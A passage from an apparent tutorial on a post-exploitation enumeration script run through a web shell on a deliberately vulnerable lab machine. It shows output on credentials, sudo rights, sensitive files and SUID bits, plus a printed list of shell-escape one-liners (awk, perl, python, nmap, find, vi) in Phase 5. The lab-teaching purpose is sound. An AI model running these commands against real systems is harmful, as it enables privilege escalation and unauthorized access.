root 4069 0.0 0.2 1872 540 ? S 13:21 0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root 4116 0.0 0.3 5312 996 ? Ss 13:21 0:00 /usr/sbin/sshd
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root 4399 0.0 0.0 0 0 ? S 13:21 0:00 [lockd]
root 4400 0.0 0.0 0 0 ? S< 13:21 0:00 [nfsd4]
root 4401 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4402 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4403 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4404 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4405 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4406 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4407 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4408 0.0 0.0 0 0 ? S 13:21 0:00 [nfsd]
root 4412 0.0 0.1 2424 332 ? Ss 13:21 0:00 /usr/sbin/rpc.mountd
root 4480 0.0 0.6 5412 1728 ? Ss 13:21 0:00 /usr/lib/postfix/master
root 4487 0.0 0.4 5388 1204 ? Ss 13:21 0:00 /usr/sbin/nmbd -D
root 4489 0.0 0.5 7724 1364 ? Ss 13:21 0:00 /usr/sbin/smbd -D
root 4493 0.0 0.3 7724 812 ? S 13:21 0:00 /usr/sbin/smbd -D
root 4508 0.0 0.3 2424 856 ? Ss 13:21 0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root 4570 0.0 0.3 2104 896 ? Ss 13:21 0:00 /usr/sbin/cron
root 4598 0.0 0.1 2052 348 ? Ss 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4599 0.0 0.1 2052 476 ? S 13:21 0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root 4619 0.0 1.0 10596 2564 ? Ss 13:21 0:00 /usr/sbin/apache2 -k start
root 4638 0.0 10.3 66344 26472 ? Sl 13:21 0:00 /usr/bin/rmiregistry
root 4642 0.5 1.0 12208 2568 ? Sl 13:21 0:08 ruby /usr/sbin/druby_timeserver.rb
root 4649 0.0 0.1 1716 488 tty1 Ss+ 13:21 0:00 /sbin/getty 38400 tty1
root 4657 0.0 0.9 8540 2372 ? S 13:21 0:01 /usr/bin/unrealircd
root 4659 0.3 4.7 14036 12016 ? S 13:21 0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root 4664 0.0 0.4 2724 1188 ? S 13:21 0:00 /bin/sh /root/.vnc/xstartup
root 4667 0.0 1.0 5936 2572 ? S 13:21 0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 4670 0.3 1.9 8988 5000 ? S 13:21 0:05 fluxbox
root 4704 0.0 0.6 2852 1544 pts/0 Ss+ 13:22 0:00 -bash
[x] Is mysql running by root:
root 4193 0.0 0.5 2768 1304 ? S 13:21 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 4235 0.1 6.6 127560 17036 ? Sl 13:21 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root 4236 0.0 0.2 1700 556 ? S 13:21 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data 4969 0.0 0.2 1784 540 pts/1 R+ 13:44 0:00 grep mysql
It will attempt to locate any cron jobs in the common directories, as well as any for root. I will also give us the contents of the crontab, which is a list of regularly run commands used by the administrator. Next, we can see the running services, including those running as root, and a check if the MySQL process is present and running as root.
Phase 4: Database Credentials
The next option we'll cover will try to connect to MySQL and login — use the -t switch to do so:
target:/var/tmp$ ./postenum.sh -t
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 25 min 31 sec
Threads: 2 Questions: 446 Slow queries: 0 Opens: 420 Flush tables: 1 Open tables: 64 Queries per second avg: 0.291
We can see that it is able to connect to the database as root with no password. It then gives us some version information, connection data, and the uptime.
Phase 5: Development Tools & Shell Escapes
The next option we will cover will look for common development tools on the system, which can often be abused and lead to privilege escalation. It will also try some common shell escapes if restricted shells are present. Use the -l option for this:
target:/var/tmp$ ./postenum.sh -l
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap
[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl
[+] - Shell escape
awk = awk 'BEGIN {system("/bin/sh")}'
perl = perl -e 'exec "/bin/sh";'
python = python -c 'import pty;pty.spawn("/bin/sh")'
php = php -r 'system("/bin/sh");'
ruby = ruby -e 'exec "/bin/sh"'
less = !sh
more = !sh
man = !sh
nmap = --interactive
nmap = echo "os.execute('/bin/sh')" > /tmp/shell.nse
find = find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find = find / -exec sh -i \;
vi = :!sh or :shell or -c '!sh'
vim = :!sh or :shell or -c '!sh'
gdb = shell
[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>
ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv
[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
We can see that it finds some dev tools and languages, such as Python, PHP, and Nmap, among others. It also checks for tools that can be used to upload files, which could lead to further compromise. Then, it lists some shell escape commands, followed by environment variables and available shells on the system.
Phase 6: Software Versions
The next option we will look at will determine some version information from common software installed on the target. Use the -v switch to do so:
target:/var/tmp$ ./postenum.sh -v
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10
[x] MYSQL version:
mysql Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing
[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)
Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
This gives us the software version numbers for Sudo, MySQL, PostgreSQL, and Java.
Phase 7: Interesting Files
The next option will attempt to locate any interesting files present on the system that could potentially be utilized for privilege escalation. Use the -c switch for this one:
target:/var/tmp$ ./postenum.sh -c
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root
[x] Useful home users:
drwxr-xr-x 2 root nogroup 4096 Mar 17 2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16 2018 /home/msfadmin
drwxr-xr-x 2 service service 4096 Apr 16 2010 /home/service
drwxr-xr-x 3 user user 4096 May 7 2010 /home/user
[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr 9 2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov 6 2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26 2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13 2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr 4 2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20 2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16 2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11 2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20 2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16 2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20 2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16 2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17 2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar 5 2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20 2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20 2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar 8 2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul 5 2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18 2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28 2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16 2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27 2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28 2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23 2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec 2 2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23 2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16 2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May 4 2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20 2012 /etc/xinetd.conf
[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
{-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...
[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13 2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13 2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16 2010 /etc/group
-r--r----- 1 root root 470 Mar 16 2010 /etc/sudoers
[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail 0 Apr 28 2010 msfadmin
-rw------- 1 root mail 722 May 7 2010 root
[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found
[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw-r--r-- 1 root root 138 Jun 19 13:21 vnc.log
[x] Interesting /home/* directory:
drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun 6 2018 msfadmin
drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
drwxr-xr-x 3 user user 4.0K May 7 2010 user
[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14 2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14 2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May 7 2010 /home/user/.bash_history
[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18 2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history
[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/
~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist
[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17 2010 /home/msfadmin/.ssh
drwx------ 2 user user 4096 May 7 2010 /home/user/.ssh
[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20 2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
[READABLE]
Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes
[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
[x] Current umask value:
0022
u=rwx,g=rx,o=rx
[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 /home/msfadmin/.rhosts
First, it gives us a list of superusers and users, followed by anything from /etc/passwd that has a shell. Next, it looks for various configuration files, sensitive files, and what the sudo permissions are like. It then checks for mail and any other interesting files in the home and root directories. Lastly, it gives us the Bash history, password policy information, and any private keys for SSH.
Phase 8: Other Files & Sticky Bits
The next option we'll cover will give us SUID and SGID information related to the filesystem. These types of files can often be abused for privilege escalation when misconfigured. It will also check for hidden files or any other useful bits of information — use the -s switch to use this:
target:/var/tmp$ ./postenum.sh -s
--------------------------------------------------------------------------
_
_ __ ___ ___| |_ ___ _ __ _ _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ || __/ | | | |_| | | | | | | version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|
POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------
postenum - be the ROOT
For help or reporting issues, visit https://github.com/mbahadou/postenum
[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x 2 root root 4.0K May 8 2010 backups
drwxr-xr-x 12 root root 4.0K Apr 28 2010 cache
drwxr-xr-x 37 root root 4.0K May 20 2012 lib
drwxrwsr-x 2 root staff 4.0K Apr 15 2008 local
drwxrwxrwt 3 root root 60 Jun 19 13:21 lock
drwxr-xr-x 14 root root 4.0K Jun 19 13:21 log
drwxrwsr-x 2 root mail 4.0K May 7 2010 mail
drwxr-xr-x 2 root root 4.0K Mar 16 2010 opt
drwxr-xr-x 14 root root 580 Jun 19 13:21 run
drwxr-xr-x 5 root root 4.0K Apr 28 2010 spool
drwxrwxrwt 2 root root 4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug 8 2018 www
[x] Any interesting file/folder in /var/www:
drwxrwxrwt 3 root root 4.0K Jun 19 2019 dav
drwxr-xr-x 8 www-data www-data 4.0K May 20 2012 dvwa
-rw-r--r-- 1 www-data www-data 891 May 20 2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14 2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14 2012 phpMyAdmin
-rw-r--r-- 1 www-data www-data 19 Apr 16 2010 phpinfo.php
drwxr-xr-x 3 www-data www-data 4.0K May 14 2012 test
drwxrwxr-x 22 www-data www-data 20K Apr 12 2018 tikiwiki
drwxrwxr-x 22 www-data www-data 20K Apr 16 2010 tikiwiki-old
drwxr-xr-x 7 www-data www-data 4.0K Apr 16 2010 twiki
ls: cannot access /var/www/html: No such file or directory
[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20 2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20 2012 /var/cache/debconf/config.dat-old
-rw-r--r-- 1 www-data www-data 18684 Mar 16 2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16 2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20 2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26 2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr 4 2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11 2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec 9 2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec 9 2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec 9 2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec 9 2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec 9 2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec 9 2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21 2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26 2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28 2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30 2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28 2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12 2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12 2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24 2003 /var/www/tikiwiki/img/icons/config.gif
[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16 2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16 2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16 2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31 2010 /home/user/.profile
-rw------- 1 user user 165 May 7 2010 /home/user/.bash_history
-rw-r--r-- 1 user user 2928 Mar 31 2010 /home/user/.bashrc
-rw-r--r-- 1 user user 220 Mar 31 2010 /home/user/.bash_logout
-rw------- 1 root root 4174 May 14 2012 /home/msfadmin/.mysql_history
-rw-r--r-- 1 msfadmin msfadmin 1598 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/bin/.htaccess.txt
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 1436 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Sandbox/.changes
-rw-r--r-- 1 msfadmin msfadmin 210 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/.htpasswd
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3657 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Main/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 3489 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Know/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 4189 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/TWiki/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 683 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/_default/.changes
-rw-r--r-- 1 msfadmin msfadmin 9 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.mailnotify
-rw-r--r-- 1 msfadmin msfadmin 767 Apr 16 2010 /home/msfadmin/vulnerable/twiki20030201/twiki-source/data/Trash/.changes
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 /home/msfadmin/.rhosts
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 /home/msfadmin/.profile
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 /home/msfadmin/.sudo_as_admin_successful
-rw------- 1 msfadmin msfadmin 0 Jun 6 2018 /home/msfadmin/.Xauthority
-rw-rw-rw- 1 root daemon 1 Aug 8 2018 /lib/tls/i686/cmov/.4tJrYgzxS.so
-rw-rw-rw- 1 root daemon 1 Jun 19 12:56 /lib/tls/i686/cmov/.CsUPZ8Z0.so
-rw-r--r-- 1 root root 5 Dec 5 2007 /usr/share/python-support/antlr/.version
-rw-r--r-- 1 root root 2 Aug 29 2007 /usr/share/python-support/python-gnupginterface/.version
-rw-r--r-- 1 root root 0 May 20 2012 /usr/lib/firefox-3.6.17/.autoreg
-rw-r--r-- 1 root root 1258 Mar 10 2008 /usr/lib/jvm/.java-gcj.jinfo
-rw------- 1 root root 215 Jun 19 13:46 /root/.mysql_history
-rwx------ 1 root root 4 May 20 2012 /root/.rhosts
-rw-r--r-- 1 root root 141 Oct 20 2007 /root/.profile
-rw-r--r-- 1 root root 173 Jun 19 2019 /root/.bash_history
-rw------- 1 root root 324 Jun 19 13:21 /root/.Xauthority
-rw-r--r-- 1 root root 2227 Oct 20 2007 /root/.bashrc
-rw-r--r-- 1 root root 102 Apr 8 2008 /etc/cron.monthly/.placeholder
